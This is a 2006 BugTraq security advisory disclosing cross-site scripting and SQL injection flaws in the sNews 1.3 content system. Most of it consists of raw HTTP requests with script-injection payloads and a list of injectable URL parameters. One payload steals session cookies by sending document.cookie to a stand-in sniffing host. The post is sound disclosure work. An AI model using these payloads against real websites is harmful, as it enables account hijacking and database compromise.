BugTraq
sNews 1.3 XSS SQL Jul 05 2006 02:58PM
securityconnection gmail com
sNews 1.3

http://snews.solucija.com

--------------------------

Cross Site Scripting (XSS)

--------------------------

POST http://target.xx:80/index.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

Host: target.xx

Content-Length: 88

pojam=<script>alert(/EllipsisSecurityTest/)</script>&search=search

---

POST http://target.xx:80/index.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

Host: target.xx

Content-Length: 130

text=1&name=1&id="><script>alert(/EllipsisSecurityTest/)</script>&commen
tspage=1&comment=test

---

POST http://target.xx/index.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

Host: target.xx

Content-Length: 130

pojam=&text=%3Cscript%3Eimg+%3D+new+Image%28%29%3B+img.src+%3D+%22http%3
A%2F%2Ftarget.xx%2Fsniff%2Fs.gif%3F%22%2Bdocument.cookie%3B%3C%2Fscript%
3E&name=Ellipsis+Test&id=1&commentspage=1&comment=%D0%9E%D1%82%D0%BF%D1%
80%D0%B0%D0%B2%D0%B8%D1%82%D1%8C

<script>img = new Image(); img.src = "http://sniff.xx/s.gif?"+document.cookie;</script>

-------------

SQL injection

-------------

http://target.xx/index.php?id='[SQL]

http://target.xx/index.php?category='[SQL]

http://target.xx/index.php?PHPSESSID=&id=[SQL]

http://target.xx/index.php?id=1'[SQL]&commentspage=1

-----------------

Ellipsis Security

http://www.ellsec.org

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus